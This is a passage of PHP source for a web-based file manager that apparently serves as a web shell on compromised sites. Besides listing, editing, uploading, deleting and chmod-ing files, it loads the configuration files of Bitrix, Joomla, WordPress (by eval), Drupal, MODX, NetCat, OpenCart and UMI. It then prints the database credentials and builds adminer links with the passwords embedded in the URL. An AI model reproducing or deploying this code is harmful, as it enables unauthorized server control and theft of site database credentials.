href=\"http://".$_SERVER['HTTP_HOST']."?bitrix_include_areas=Y\">".$_SERVER['HTTP_HOST']."</a> <a target=\"_blank\" href=\"http://".$_SERVER['HTTP_HOST']."/assets/start.php\">/assets/start.php</a> <a target=\"_blank\" href=\"".basename(__FILE__)."\">++".basename(__FILE__)."</a> <a target=\"_blank\" href=\"?p=bitrix\">bitrix</a> <a target=\"_blank\" href=\"?p=sape\">sape</a> <a target=\"_blank\" href=\"?p=find\">find</a> <a target=\"_blank\" href=\"?p=fix_prolog\">fix_prolog</a> <a target=\"_blank\" href=\"http://localhost/e.php?name=".$_SERVER['HTTP_HOST']."\">e</a> <a target=\"_blank\" href=\"/bitrix/admin/composite.php?lang=ru\">composite</a> <a target=\"_blank\" href=\"?p=log\">log</a></nobr> <tr> <td bgcolor=\"#DDDDDD\" colspan=50><nobr> <input type=\"button\" style=\"width:80\" onclick=\"selectANI(this)\" id=\"ANI0\" value=\"".et('SelAll')."\"> <input type=\"button\" style=\"width:80\" onclick=\"selectANI(this)\" value=\"".et('SelInverse')."\"> <input type=\"button\" style=\"width:80\" onclick=\"test(4)\" value=\"".et('Delete')."\"> <input type=\"button\" style=\"width:80\" onclick=\"sel_dir(5)\" value=\"".et('Copy')."\"> <input type=\"button\" style=\"width:80\" onclick=\"sel_dir(6)\" value=\"".et('Move')."\">"; if (!$is_windows) $out .= " <input type=\"button\" style=\"width:100\" onclick=\"resolve_ids()\" value=\"".et('ResolveIDs')."\">"; $out .= " <input type=\"button\" style=\"width:100\" onclick=\"chmod_form()\" value=\"".et('Perms')."\"> <input type=button value=\"CopyToClip\" onclick=\"copyToClipboard()\"> "; $out .= " </nobr></td> </tr> <tr> <td bgcolor=\"#DDDDDD\" colspan=50 id=\"sel_dir_warn\" style=\"display:none\"><nobr><font color=\"red\">".et('SelDir')."...</font></nobr></td> </tr>"; echo "<script> function copyToClipboard() { const str = document.getElementById('item-to-copy').innerText; const el = document.createElement('textarea'); el.value = str; el.setAttribute('readonly', ''); el.style.position = 'absolute'; el.style.left = '-9999px'; document.body.appendChild(el); el.select(); document.execCommand('copy'); document.body.removeChild(el); } </script>"; echo ' <p id="item-to-copy" style="display:none;">'; $scandir_to_copy = scandir($path); foreach($scandir_to_copy as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "$dir"."\n"; } echo '</p>'; $file_count = 0; $dir_count = 0; $dir_out = array(); $file_out = array(); $max_opt = 0; foreach ($entry_list as $ind=>$dir_entry) { $file = $dir_entry["name"]; if ($dir_entry["type"]=="dir"){ $dir_out[$dir_count] = array(); $dir_out[$dir_count][] = " <tr ID=\"entry$ind\" class=\"entryUnselected\" onmouseover=\"selectEntry(this, 'over');\" onmousedown=\"selectEntry(this, 'click');\"> <td><nobr><a href=\"JavaScript:go('".addslashes($file)."')\">".utf8_convert($file)."</a></nobr></td>"; $dir_out[$dir_count][] = "<td>".$dir_entry["p"]."</td>"; if (!$is_windows) { $dir_out[$dir_count][] = "<td><nobr>".$dir_entry["u"]."</nobr></td>"; $dir_out[$dir_count][] = "<td><nobr>".$dir_entry["g"]."</nobr></td>"; } $dir_out[$dir_count][] = "<td><nobr>".$dir_entry["sizet"]."</nobr></td>"; $dir_out[$dir_count][] = "<td><nobr>".$dir_entry["datet"]."</nobr></td>"; if ($has_files) $dir_out[$dir_count][] = "<td> </td>"; // Op????es de diret??rio if ( is_writable($fm_current_dir.$file) ) $dir_out[$dir_count][] = " <td align=center><a href=\"JavaScript:if(confirm('".et('ConfRem')." \\'".addslashes($file)."\\' ?')) document.location.href='".addslashes($fm_path_info["basename"])."?frame=3&action=8&cmd_arg=".addslashes($file)."&fm_current_dir=".addslashes($fm_current_dir)."'\">".et('Delete')."</a>"; if ( is_writable($fm_current_dir.$file) ) $dir_out[$dir_count][] = " <td align=center><a href=\"JavaScript:rename('".addslashes($file)."')\">".et('Rename')."</a>"; if (count($dir_out[$dir_count])>$max_opt){ $max_opt = count($dir_out[$dir_count]); } $dir_count++; } else { $file_out[$file_count] = array(); $file_out[$file_count][] = " <tr ID=\"entry$ind\" class=\"entryUnselected\" onmouseover=\"selectEntry(this, 'over');\" onmousedown=\"selectEntry(this, 'click');\"> <td><nobr><a href=\"JavaScript:download('".addslashes($file)."')\">".utf8_convert($file)."</a></nobr></td>"; $file_out[$file_count][] = "<td>".$dir_entry["p"]."</td>"; if (!$is_windows) { $file_out[$file_count][] = "<td><nobr>".$dir_entry["u"]."</nobr></td>"; $file_out[$file_count][] = "<td><nobr>".$dir_entry["g"]."</nobr></td>"; } $file_out[$file_count][] = "<td><nobr>".$dir_entry["sizet"]."</nobr></td>"; $file_out[$file_count][] = "<td><nobr>".$dir_entry["datet"]."</nobr></td>"; $file_out[$file_count][] = "<td>".$dir_entry["extt"]."</td>"; // Op????es de arquivo if ( is_writable($fm_current_dir.$file) ) $file_out[$file_count][] = " <td align=center><a href=\"javascript:if(confirm('".uppercase(et('Delete'))." \\'".addslashes($file)."\\' ?')) document.location.href='".addslashes($fm_path_info["basename"])."?frame=3&action=8&cmd_arg=".addslashes($file)."&fm_current_dir=".addslashes($fm_current_dir)."'\">".et('Delete')."</a>"; else $file_out[$file_count][] = "<td> </td>"; if ( is_writable($fm_current_dir.$file) ) $file_out[$file_count][] = " <td align=center><a href=\"javascript:rename('".addslashes($file)."')\">".et('Rename')."</a>"; else $file_out[$file_count][] = "<td> </td>"; if ( is_readable($fm_current_dir.$file) && (strpos(".wav#.mp3#.mid#.avi#.mov#.mpeg#.mpg#.rm#.iso#.bin#.img#.dll#.psd#.fla#.swf#.class#.ppt#.tif#.tiff#.pcx#.jpg#.gif#.png#.wmf#.eps#.bmp#.msi#.exe#.com#.rar#.tar#.zip#.bz2#.tbz2#.bz#.tbz#.bzip#.gzip#.gz#.tgz#", $dir_entry["ext"]."#" ) === false)) $file_out[$file_count][] = " <td align=center><a href=\"javascript:edit_file_form('".addslashes($file)."')\">".et('Edit')."</a>"; else $file_out[$file_count][] = "<td> </td>"; if ( is_readable($fm_current_dir.$file) && (strpos(".txt#.sys#.bat#.ini#.conf#.swf#.php#.php3#.asp#.html#.htm#.jpg#.gif#.png#.bmp#", $dir_entry["ext"]."#" ) !== false)) $file_out[$file_count][] = " <td align=center><a href=\"javascript:view_form('".addslashes($file)."');\">".et('View')."</a>"; else $file_out[$file_count][] = "<td> </td>"; if (count($file_out[$file_count])>$max_opt){ $max_opt = count($file_out[$file_count]); } $file_count++; } } if ($dir_count){ $out .= " <tr> <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or1&fm_current_dir=$fm_current_dir\">".et('Name')."</a></nobr></td> <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or2&fm_current_dir=$fm_current_dir\">".et('Perm')."</a></nobr></td>"; if (!$is_windows) $out .= " <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or3&fm_current_dir=$fm_current_dir\">".et('Owner')."</a></td> <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or4&fm_current_dir=$fm_current_dir\">".et('Group')."</a></nobr></td>"; $out .= " <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or5&fm_current_dir=$fm_current_dir\">".et('Size')."</a></nobr></td> <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or6&fm_current_dir=$fm_current_dir\">".et('Date')."</a></nobr></td>"; if ($file_count) $out .= " <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or7&fm_current_dir=$fm_current_dir\">".et('Type')."</a></nobr></td>"; $out .= " <td bgcolor=\"#DDDDDD\" colspan=50> </td> </tr>"; } foreach($dir_out as $k=>$v){ while (count($dir_out[$k])<$max_opt) { $dir_out[$k][] = "<td> </td>"; } $out .= implode($dir_out[$k]); $out .= "</tr>"; } if ($file_count){ $out .= " <tr> <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or1&fm_current_dir=$fm_current_dir\">".et('Name')."</a></nobr></td> <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or2&fm_current_dir=$fm_current_dir\">".et('Perm')."</a></nobr></td>"; if (!$is_windows) $out .= " <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or3&fm_current_dir=$fm_current_dir\">".et('Owner')."</a></td> <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or4&fm_current_dir=$fm_current_dir\">".et('Group')."</a></nobr></td>"; $out .= " <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or5&fm_current_dir=$fm_current_dir\">".et('Size')."</a></nobr></td> <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or6&fm_current_dir=$fm_current_dir\">".et('Date')."</a></nobr></td> <td bgcolor=\"#DDDDDD\"><nobr><a href=\"".$fm_path_info["basename"]."?frame=3&or_by=$or7&fm_current_dir=$fm_current_dir\">".et('Type')."</a></nobr></td> <td bgcolor=\"#DDDDDD\" colspan=50> </td> </tr>"; } foreach($file_out as $k=>$v){ while (count($file_out[$k])<$max_opt) { $file_out[$k][] = "<td> </td>"; } $out .= implode($file_out[$k]); $out .= "</tr>"; } $out .= " <tr> <td bgcolor=\"#DDDDDD\" colspan=50><nobr> <input type=\"button\" style=\"width:80\" onclick=\"selectANI(this)\" id=\"ANI1\" value=\"".et('SelAll')."\"> <input type=\"button\" style=\"width:80\" onclick=\"selectANI(this)\" value=\"".et('SelInverse')."\"> <input type=\"button\" style=\"width:80\" onclick=\"test(4)\" value=\"".et('Delete')."\"> <input type=\"button\" style=\"width:80\" onclick=\"sel_dir(5)\" value=\"".et('Copy')."\"> <input type=\"button\" style=\"width:80\" onclick=\"sel_dir(6)\" value=\"".et('Move')."\"> "; if (!$is_windows) $out .= " <input type=\"button\" style=\"width:100\" onclick=\"resolve_ids()\" value=\"".et('ResolveIDs')."\">"; $out .= " <input type=\"button\" style=\"width:100\" onclick=\"chmod_form()\" value=\"".et('Perms')."\">"; $out .= " </nobr></td> </tr>"; $out .= " </form>"; $out .= " <script language=\"Javascript\" type=\"text/javascript\"> <!-- update_sel_status(); //--> </script>"; } else { $out .= " <tr bgcolor=\"#DDDDDD\"><td colspan=50><nobr>$uplink <a target=\"_blank\" href=\"http://".$_SERVER['HTTP_HOST']."\">".$_SERVER['HTTP_HOST']."</a> <a target=\"_blank\" href=\"http://".$_SERVER['HTTP_HOST']."/assets/start.php\">/assets/start.php</a> <a target=\"_blank\" href=\"".basename(__FILE__)."\">++".basename(__FILE__)."</a> <a target=\"_blank\" href=\"?p=bitrix\">bitrix</a> <a target=\"_blank\" href=\"?p=sape\">sape</a> <a target=\"_blank\" href=\"http://localhost/e.php?name=".$_SERVER['HTTP_HOST']."\">e</a> <a target=\"_blank\" href=\"/bitrix/admin/composite.php?lang=ru\">composite</a> <a target=\"_blank\" href=\"?p=log\">log</a></nobr></tr>"; } } else $out .= "<tr><td><font color=red>".et('IOError').".<br>$fm_current_dir</font>"; $out .= "</table>"; echo $out; if (file_exists($_SERVER["DOCUMENT_ROOT"]."/bitrix/php_interface/dbconn.php")) require($_SERVER["DOCUMENT_ROOT"]."/bitrix/php_interface/dbconn.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/configuration.php")) require($_SERVER["DOCUMENT_ROOT"]."/configuration.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/config.php")) require($_SERVER["DOCUMENT_ROOT"]."/config.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/manager/includes/config.inc.php")) require($_SERVER["DOCUMENT_ROOT"]."/manager/includes/config.inc.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/core/config/config.inc.php")) require($_SERVER["DOCUMENT_ROOT"]."/core/config/config.inc.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/vars.inc.php")) require($_SERVER["DOCUMENT_ROOT"]."/vars.inc.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/netcat/vars.inc.php")) require($_SERVER["DOCUMENT_ROOT"]."/netcat/vars.inc.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/system/vars.inc.php")) require($_SERVER["DOCUMENT_ROOT"]."/system/vars.inc.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/sites/default/settings.php")) require($_SERVER["DOCUMENT_ROOT"]."/sites/default/settings.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/config.ini")) { $config = parse_ini_file($_SERVER["DOCUMENT_ROOT"]."/config.ini", true); print_r($config['connections']); if ($config['connections']['core.host'] <> '') echo '<a target="_blank" href="/assets/adminer.php?server='.$config['connections']['core.host'].'&pass='.$config['connections']['core.password'].'&username='.$config['connections']['core.login'].'&db='.$config['connections']['core.dbname'].'">umi</a><br>'; } if (file_exists($_SERVER["DOCUMENT_ROOT"]."/wp-config.php")) { $file_data = ''; $fd = fopen($_SERVER["DOCUMENT_ROOT"]."/wp-config.php", "r"); while (!feof($fd)) { $file_data .= fgets($fd, 5000); } fclose ($fd); $file_data = substr($file_data, 5); $n = strripos($file_data, 'if ( !defined'); $file_data = substr($file_data, 0, $n); eval($file_data); } if (file_exists($_SERVER["DOCUMENT_ROOT"]."/configuration.php")) $config = new JConfig; if ($DBHost <> '') echo '<a target="_blank" href="/assets/adminer.php?server='.$DBHost.'&pass='.$DBPassword.'&username='.$DBLogin.'&db='.$DBName.'">bitrix</a><br>'; if ($config->host <> '') echo '<a target="_blank" href="/assets/adminer.php?server='.$config->host.'&pass='.$config->password.'&username='.$config->user.'&db='.$config->db.'">joomla</a><br>'; if ($database_server <> '') echo '<a target="_blank" href="/assets/adminer.php?server='.$database_server.'&pass='.$database_password.'&username='.$database_user.'&db='.$dbase.'">modx</a><br>'; if ($MYSQL_HOST <> '') echo '<a target="_blank" href="/assets/adminer.php?server='.$MYSQL_HOST.'&pass='.$MYSQL_PASSWORD.'&username='.$MYSQL_USER.'&db='.$MYSQL_DB_NAME.'">netcat</a>'; if (file_exists($_SERVER["DOCUMENT_ROOT"]."/wp-config.php")) echo '<a target="_blank" href="/assets/adminer.php?server='.DB_HOST.'&pass='.DB_PASSWORD.'&username='.DB_USER.'&db='.DB_NAME.'">WordPress</a>'; if (file_exists($_SERVER["DOCUMENT_ROOT"]."/sites/default/settings.php")) echo '<a target="_blank" href="/assets/adminer.php?server='.$databases['default']['default']['host'].'&pass='.$databases['default']['default']['password'].'&username='.$databases['default']['default']['username'].'&db='.$databases['default']['default']['database'].'">drupal</a>'; if (file_exists($_SERVER["DOCUMENT_ROOT"]."/sites/default/settings.php")) print_r($databases['default']['default']); if (file_exists($_SERVER["DOCUMENT_ROOT"]."/config.php")) echo '<a target="_blank" href="/assets/adminer.php?server='.DB_HOSTNAME.'&pass='.DB_PASSWORD.'&username='.DB_USERNAME.'&db='.DB_DATABASE.'">opencart</a>'; } function upload_form(){ global $_FILES,$fm_current_dir,$dir_dest,$quota_mb,$fm_path_info; html_header(); echo "<body marginwidth=\"0\" marginheight=\"0\">"; if (count($_FILES)==0){ echo " <table height=\"100%\" border=0 cellspacing=0 cellpadding=2 style=\"padding:5px;\"> <form name=\"upload_form\" action=\"".$fm_path_info["basename"]."\" method=\"post\" ENCTYPE=\"multipart/form-data\"> <input type=hidden name=dir_dest value=\"$fm_current_dir\"> <input type=hidden name=action value=10> <tr><td colspan=2 align=left><nobr><b>".et('Destination').": $fm_current_dir</b></nobr></td></tr> <tr><td width=1 align=right><b>".et('File_s').":<td><nobr><input type=\"file\" id=\"upfiles\" name=\"upfiles[]\" multiple onchange=\"upfiles_update(this);\"></nobr></td></tr> <tr><td> <td><input type=button value=\"".et('Send')."\" onclick=\"upfiles_send()\"></nobr></td></tr> <tr><td colspan=2 align=left><div id=\"upfileslist\"></div></td></tr> </form> </table> <script language=\"Javascript\" type=\"text/javascript\"> <!-- foi = false; function upfiles_update(fileinput){ var files = document.getElementById(\"upfiles\").files; var text = ''; if (files.length > 1) { for (var i = 0; i < files.length; ++i) { text += '<nobr>' + (i+1) + ' - ' + files[i].name + '</nobr><br>'; } } document.getElementById(\"upfileslist\").innerHTML = text; } function upfiles_send(){ if(true){ if (foi) alert('".et('SendingForm')."...'); else { foi = true; document.upload_form.submit(); } } else alert('".et('NoFileSel').".'); } //--> </script>"; } else { $out = "<tr><th colspan=2>".et('UploadEnd')."</th></tr> <tr><td colspan=2 align=left><nobr><b>".et('Destination').": $fm_current_dir</b></nobr></td></tr>"; $files = array(); if (is_array($_FILES['upfiles'])){ // Check and re-arrange multi-upload array() if (is_array($_FILES['upfiles']['name'])){ for($i=0;$i<count($_FILES['upfiles']['name']);$i++){ if ($_FILES['upfiles']['error'][$i] === 0) $files[] = array( 'name' => $_FILES['upfiles']['name'][$i], 'tmp_name' => $_FILES['upfiles']['tmp_name'][$i], 'size' => $_FILES['upfiles']['size'][$i], 'type' => $_FILES['upfiles']['type'][$i], 'error' => $_FILES['upfiles']['error'][$i] ); } } else { foreach ($_FILES['upfiles'] as $file){ if ($file['error'] === 0) $files[] = $file; } } } $i=1; foreach ($files as $file) { $filename = $file["name"]; $temp_file = $file["tmp_name"]; if (strlen($filename)) { $resul = save_upload($temp_file,$filename,$dir_dest); switch($resul){ case 1: $out .= "<tr><td align=right>".$i." - <font color=green>".et('FileSent')."</font>:</td><td>".$filename."</td></tr>\n"; break; case 2: $out .= "<tr><td align=right>".$i." - <font color=red>".et('IOError')."</font>:</td><td>".$filename."</td></tr>\n"; break; case 3: $out .= "<tr><td align=right>".$i." - <font color=red>".et('SpaceLimReached')." ($quota_mb Mb)</font>:</td><td>".$filename."</td></tr>\n"; break; case 4: $out .= "<tr><td align=right>".$i." - <font color=red>".et('InvExt')."</font>:</td><td>".$filename."</td></tr>\n"; break; case 5: $out .= "<tr><td align=right>".$i." - <font color=red>".et('FileNoOverw')."</font>:</td><td>".$filename."</td></tr>\n"; break; case 6: $out .= "<tr><td align=right>".$i." - <font color=green>".et('FileOverw')."</font>:</td><td>".$filename."</td></tr>\n"; break; default: $out .= "<tr><td align=right>".$i." - <font color=green>".et('FileIgnored')."</font>:</td><td>".$filename."</td></tr>\n"; } $i++; } } echo "<table height=\"100%\" border=0 cellspacing=0 cellpadding=2 style=\"padding:5px;\">".$out."</table>"; } echo "</body>\n</html>"; } function chmod_form(){ html_header(" <script language=\"Javascript\" type=\"text/javascript\"> <!-- function octalchange() { var val = document.chmod_form.t_total.value; var stickybin = parseInt(val.charAt(0)).toString(2); var ownerbin = parseInt(val.charAt(1)).toString(2); while (ownerbin.length<3) { ownerbin=\"0\"+ownerbin; }; var groupbin = parseInt(val.charAt(2)).toString(2); while (groupbin.length<3) { groupbin=\"0\"+groupbin; }; var otherbin = parseInt(val.charAt(3)).toString(2); while (otherbin.length<3) { otherbin=\"0\"+otherbin; }; document.chmod_form.sticky.checked = parseInt(stickybin.charAt(0)); document.chmod_form.owner4.checked = parseInt(ownerbin.charAt(0)); document.chmod_form.owner2.checked = parseInt(ownerbin.charAt(1)); document.chmod_form.owner1.checked = parseInt(ownerbin.charAt(2)); document.chmod_form.group4.checked = parseInt(groupbin.charAt(0)); document.chmod_form.group2.checked = parseInt(groupbin.charAt(1)); document.chmod_form.group1.checked = parseInt(groupbin.charAt(2)); document.chmod_form.other4.checked = parseInt(otherbin.charAt(0)); document.chmod_form.other2.checked = parseInt(otherbin.charAt(1)); document.chmod_form.other1.checked = parseInt(otherbin.charAt(2)); calc_chmod(1); }; function calc_chmod(nototals) { var users = new Array(\"owner\", \"group\", \"other\"); var totals = new Array(\"\",\"\",\"\"); var syms = new Array(\"\",\"\",\"\"); for (var i=0; i<users.length; i++) { var user=users[i]; var field4 = user + \"4\"; var field2 = user + \"2\"; var field1 = user + \"1\"; var symbolic = \"sym_\" + user; var number = 0; var sym_string = \"\"; var sticky = \"0\"; var sticky_sym = \" \"; if (document.chmod_form.sticky.checked){ sticky = \"1\"; sticky_sym = \"t\"; } if (document.chmod_form[field4].checked == true) { number += 4; } if (document.chmod_form[field2].checked == true) { number += 2; } if (document.chmod_form[field1].checked == true) { number += 1; } if (document.chmod_form[field4].checked == true) { sym_string += \"r\"; } else { sym_string += \"-\"; } if (document.chmod_form[field2].checked == true) { sym_string += \"w\"; } else { sym_string += \"-\"; } if (document.chmod_form[field1].checked == true) { sym_string += \"x\"; } else { sym_string += \"-\"; } totals[i] = totals[i]+number; syms[i] = syms[i]+sym_string; }; if (!nototals) document.chmod_form.t_total.value = sticky + totals[0] + totals[1] + totals[2]; document.chmod_form.sym_total.value = syms[0] + syms[1] + syms[2] + sticky_sym; } function sticky_change() { document.chmod_form.sticky.checked = !(document.chmod_form.sticky.checked); } function apply_chmod() { if (confirm('".et('AlterPermTo')." \\' '+document.chmod_form.t_total.value+' \\' ?\\n')){ window.top.frame3.set_chmod_arg(document.chmod_form.t_total.value); window.top.frame3.closeModalWindow(); } } window.onload=octalchange //--> </script>"); echo "<body marginwidth=\"0\" marginheight=\"0\"> <form name=\"chmod_form\"> <table border=\"0\" cellspacing=\"0\" cellpadding=\"4\" align=center style=\"padding:5px;\"> <tr align=\"left\" valign=\"middle\"> <td><input type=\"text\" name=\"t_total\" value=\"0755\" size=\"4\" onKeyUp=\"octalchange()\"> </td> <td><input type=\"text\" name=\"sym_total\" value=\"\" size=\"12\" readonly=\"1\"></td> </tr> </table> <table cellpadding=\"2\" cellspacing=\"0\" border=\"0\" align=center> <tr bgcolor=\"#333333\"> <td width=\"60\" align=\"left\"> </td> <td width=\"55\" align=\"center\" style=\"color:#FFFFFF\"><b>".et('Owner')." </b></td> <td width=\"55\" align=\"center\" style=\"color:#FFFFFF\"><b>".et('Group')." </b></td> <td width=\"55\" align=\"center\" style=\"color:#FFFFFF\"><b>".et('Other')." <b></td> </tr> <tr bgcolor=\"#DDDDDD\"> <td width=\"60\" align=\"left\" nowrap bgcolor=\"#FFFFFF\">".et('Read')."</td> <td width=\"55\" align=\"center\" bgcolor=\"#EEEEEE\"> <input type=\"checkbox\" name=\"owner4\" value=\"4\" onclick=\"calc_chmod()\"> </td> <td width=\"55\" align=\"center\" bgcolor=\"#FFFFFF\"><input type=\"checkbox\" name=\"group4\" value=\"4\" onclick=\"calc_chmod()\"> </td> <td width=\"55\" align=\"center\" bgcolor=\"#EEEEEE\"> <input type=\"checkbox\" name=\"other4\" value=\"4\" onclick=\"calc_chmod()\"> </td> </tr> <tr bgcolor=\"#DDDDDD\"> <td width=\"60\" align=\"left\" nowrap bgcolor=\"#FFFFFF\">".et('Write')."</td> <td width=\"55\" align=\"center\" bgcolor=\"#EEEEEE\"> <input type=\"checkbox\" name=\"owner2\" value=\"2\" onclick=\"calc_chmod()\"></td> <td width=\"55\" align=\"center\" bgcolor=\"#FFFFFF\"><input type=\"checkbox\" name=\"group2\" value=\"2\" onclick=\"calc_chmod()\"> </td> <td width=\"55\" align=\"center\" bgcolor=\"#EEEEEE\"> <input type=\"checkbox\" name=\"other2\" value=\"2\" onclick=\"calc_chmod()\"> </td> </tr> <tr bgcolor=\"#DDDDDD\"> <td width=\"60\" align=\"left\" nowrap bgcolor=\"#FFFFFF\">".et('Exec')."</td> <td width=\"55\" align=\"center\" bgcolor=\"#EEEEEE\"> <input type=\"checkbox\" name=\"owner1\" value=\"1\" onclick=\"calc_chmod()\"> </td> <td width=\"55\" align=\"center\" bgcolor=\"#FFFFFF\"><input type=\"checkbox\" name=\"group1\" value=\"1\" onclick=\"calc_chmod()\"> </td> <td width=\"55\" align=\"center\" bgcolor=\"#EEEEEE\"> <input type=\"checkbox\" name=\"other1\" value=\"1\" onclick=\"calc_chmod()\"> </td> </tr> </table> <table border=\"0\" cellspacing=\"0\" cellpadding=\"4\" align=center> <tr><td colspan=2><input type=checkbox name=sticky value=\"1\" onclick=\"calc_chmod()\"> <a href=\"JavaScript:sticky_change();\">".et('StickyBit')."</a><td colspan=2 align=right><input type=button value=\"".et('Apply')."\" onClick=\"apply_chmod()\"></tr> </table> </form> </body>\n</html>"; } function get_mime_type($ext = ''){ $mimes = array( 'hqx' => 'application/mac-binhex40', 'cpt' => 'application/mac-compactpro', 'doc' => 'application/msword', 'bin' => 'application/macbinary', 'dms' => 'application/octet-stream', 'lha' => 'application/octet-stream', 'lzh' => 'application/octet-stream', 'exe' => 'application/octet-stream', 'class' => 'application/octet-stream', 'psd' => 'application/octet-stream', 'so' => 'application/octet-stream', 'sea' => 'application/octet-stream', 'dll' => 'application/octet-stream', 'oda' => 'application/oda', 'pdf' => 'application/pdf', 'ai' => 'application/postscript', 'eps' => 'application/postscript', 'ps' => 'application/postscript', 'smi' => 'application/smil', 'smil' => 'application/smil', 'mif' => 'application/vnd.mif', 'xls' => 'application/vnd.ms-excel', 'ppt' => 'application/vnd.ms-powerpoint', 'pptx' => 'application/vnd.ms-powerpoint', 'wbxml' => 'application/vnd.wap.wbxml', 'wmlc' => 'application/vnd.wap.wmlc', 'dcr' => 'application/x-director', 'dir' => 'application/x-director', 'dxr' => 'application/x-director', 'dvi' => 'application/x-dvi', 'gtar' => 'application/x-gtar', 'php' => 'application/x-httpd-php', 'php4' => 'application/x-httpd-php', 'php3' => 'application/x-httpd-php', 'phtml' => 'application/x-httpd-php', 'phps' => 'application/x-httpd-php-source', 'js' => 'application/x-javascript', 'swf' => 'application/x-shockwave-flash', 'sit' => 'application/x-stuffit', 'tar' => 'application/x-tar', 'tgz' => 'application/x-tar', 'xhtml' => 'application/xhtml+xml', 'xht' => 'application/xhtml+xml', 'zip' => 'application/zip', 'mid' => 'audio/midi', 'midi' => 'audio/midi', 'mpga' => 'audio/mpeg', 'mp2' => 'audio/mpeg', 'mp3' => 'audio/mpeg', 'aif' => 'audio/x-aiff', 'aiff' => 'audio/x-aiff', 'aifc' => 'audio/x-aiff', 'ram' => 'audio/x-pn-realaudio', 'rm' => 'audio/x-pn-realaudio', 'rpm' => 'audio/x-pn-realaudio-plugin', 'ra' => 'audio/x-realaudio', 'rv' => 'video/vnd.rn-realvideo', 'wav' => 'audio/x-wav', 'bmp' => 'image/bmp', 'gif' => 'image/gif', 'jpeg' => 'image/jpeg', 'jpg' => 'image/jpeg', 'jpe' => 'image/jpeg', 'png' => 'image/png', 'tiff' => 'image/tiff', 'tif' => 'image/tiff', 'css' => 'text/css', 'html' => 'text/html', 'htm' => 'text/html', 'shtml' => 'text/html', 'txt' => 'text/plain', 'text' => 'text/plain', 'log' => 'text/plain', 'rtx' => 'text/richtext', 'rtf' => 'text/rtf', 'xml' => 'text/xml', 'xsl' => 'text/xml', 'mpeg' => 'video/mpeg', 'mpg' => 'video/mpeg', 'mpe' => 'video/mpeg', 'qt' => 'video/quicktime', 'mov' => 'video/quicktime', 'avi' => 'video/x-msvideo', 'movie' => 'video/x-sgi-movie', 'doc' => 'application/msword', 'docx' => 'application/msword', 'word' => 'application/msword', 'xl' => 'application/excel', 'xls' => 'application/excel', 'xlsx' => 'application/excel', 'eml' => 'message/rfc822' ); return (!isset($mimes[lowercase($ext)])) ? 'application/octet-stream' : $mimes[lowercase($ext)]; } function view_form(){ global $doc_root,$fm_path_info,$url_info,$fm_current_dir,$is_windows,$filename,$passthru; if (intval($passthru)){ $file = $fm_current_dir.$filename; if(file_exists($file)){ $is_denied = false; foreach($download_ext_filter as $key=>$ext){ if (eregi($ext,$filename)){ $is_denied = true; break; } } if (!$is_denied){ if ($fh = fopen("$file", "rb")){ fclose($fh); $ext = pathinfo($file, PATHINFO_EXTENSION); $ctype = get_mime_type($ext); if ($ctype == "application/octet-stream") $ctype = "text/plain"; header("Pragma: public"); header("Expires: 0"); header("Connection: close"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Type: ".$ctype); header("Content-Disposition: inline; filename=\"".pathinfo($file, PATHINFO_BASENAME)."\";"); header("Content-Transfer-Encoding: binary"); header("Content-Length: ".filesize($file)); @readfile($file); exit(); } else alert(et('ReadDenied').": ".$file); } else alert(et('ReadDenied').": ".$file); } else alert(et('FileNotFound').": ".$file); echo " <script language=\"Javascript\" type=\"text/javascript\"> <!-- window.close(); //--> </script>"; } else { html_header(); echo "<body marginwidth=\"0\" marginheight=\"0\">"; $is_reachable_thru_webserver = (stristr($fm_current_dir,$doc_root)!==false); if ($is_reachable_thru_webserver){ $url = $url_info["scheme"]."://".$url_info["host"]; if (strlen($url_info["port"])) $url .= ":".$url_info["port"]; // Malditas variaveis de sistema!! No windows doc_root ?? sempre em lowercase... cad?? o str_ireplace() ?? $url .= str_replace($doc_root,"","/".$fm_current_dir).$filename; } else { $url = addslashes($fm_path_info["basename"])."?action=4&fm_current_dir=".addslashes($fm_current_dir)."&filename=".addslashes($filename)."&passthru=1"; } echo " <script language=\"Javascript\" type=\"text/javascript\"> <!-- document.location.href='$url'; //--> </script> </body>\n</html>"; } } function edit_file_form(){ global $fm_current_dir,$filename,$file_data,$save_file,$fm_path_info; $file = $fm_current_dir.$filename; if ($save_file){ $fh=fopen($file,"w"); fputs($fh,$file_data,strlen($file_data)); fclose($fh); } $fh=fopen($file,"r"); $file_data=fread($fh, filesize($file)); fclose($fh); html_header(); echo "<body marginwidth=\"0\" marginheight=\"0\"> <table border=0 cellspacing=0 cellpadding=5 align=center 